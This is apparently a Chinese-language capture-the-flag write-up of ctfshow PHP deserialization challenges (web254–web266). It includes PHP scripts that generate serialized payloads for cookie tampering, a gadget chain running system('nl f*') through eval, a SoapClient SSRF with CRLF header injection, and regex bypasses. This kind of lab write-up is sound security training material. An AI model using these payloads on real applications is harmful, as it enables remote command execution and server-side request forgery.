[huayang]

头疼的序列化来了，想起被代码审计支配的恐惧，难受

web254

?username=xxxxxx&password=xxxxxx

　

还是有个小知识：Public Function 和 Function 的区别

web255

课代表来啦

<?phpclass ctfShowUser{    public $isVip=true;}echo serialize(new ctfShowUser);

O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}url编码payload：get：?username=xxxxxx&password=xxxxxxcookie：;user=O:11:"ctfShowUser":1:{s:5:"isVip"%3Bb:1%3B}

web256

课代表

别的和上面一样

<?phpclass ctfShowUser{    public $isVip=true;    public $username='x';}echo serialize(new ctfShowUser);

O:11:"ctfShowUser":2:{s:5:"isVip";b:1;s:8:"username";s:1:"x";}url编码payload：get：?username=x&password=xxxxxxcookie：;user=O:11:"ctfShowUser":2:{s:5:"isVip"%3Bb:1%3Bs:8:"username"%3Bs:1:"x"%3B}

web257

课代表

__construct 当对象被创建的时候自动调用，对对象进行初始化。当所有的操作执行完毕之后，需要释放序列化的对象，触发__destruct () 魔术方法

php7.1 + 反序列化对类属性不敏感

本地序列化的时候将原属性 privat 改为 public 进行绕过即可

可见这篇文章 https://hellohy.top/huayang/711.html

思路就是发现可执行函数eval，要使用eval就要调用（执行）backDoor类中的getinfo，要调用getInfo就需要执行__destruct，因为魔法方法__construct()最后会释放序列化对象，当__destruct函数的对象所有引用都释放时执行__destruct函数

<?phpclass ctfShowUser{    public $class;    public function __construct(){        $this->class=new backDoor();    }}class backDoor{    public $code='system("nl f*");';}$b=new ctfShowUser();echo urlencode(serialize($b));

O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A16%3A%22system%28%22nl+f%2A%22%29%3B%22%3B%7D%7D

web258

有过滤了

[oc] --> 匹配内部某个字符\d --> 匹配数字+ --> 匹配至少一个

只需把上面生成的 O: 改为 O + 就行了

<?phpclass ctfShowUser{    public $class;    public function __construct(){        $this->class=new backDoor();    }}class backDoor{    public $code='system("nl f*");';}$b=new ctfShowUser();echo urlencode(str_replace('O:', 'O:+',serialize($b)));

web259

太难了给一下羽师傅的

<?php$target = 'http://127.0.0.1/flag.php';$post_string = 'token=ctfshow';$b = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'=> "ssrf"));$a = serialize($b);$a = str_replace('^^',"\r\n",$a);echo urlencode($a);?>

O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A4%3A%22ssrf%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A128%3A%22wupco%0D%0AX-Forwarded-For%3A127.0.0.1%2C127.0.0.1%0D%0AContent-Type%3A+application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A+13%0D%0A%0D%0Atoken%3Dctfshow%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D

先传入访问一下

再访问 /flag.txt

推荐师傅文章：羽师傅
Y4tacker

web260

序列化后

web262

可以猜到是逃逸，但就是不会做

比月饼杯第一题难些

没了解过的可以去看看：https://hellohy.top/huayang/981.html

web265

使用引用

<?phpclass ctfshowAdmin{    public function login(){        return $this->token===$this->password;    }}$a = new ctfshowAdmin();$a->password=&$a->token;#引用echo urlencode(serialize($a));

web266

<?phpclass ctfshow{}$a=new ctfshow();echo strtoupper(serialize($a));

O:7:"CTFSHOW":0:{}

加上 strtoupperr 绕过正则

没有传参就去bp上用

[/huayang]

FROM：浅浅淡淡[hellohy]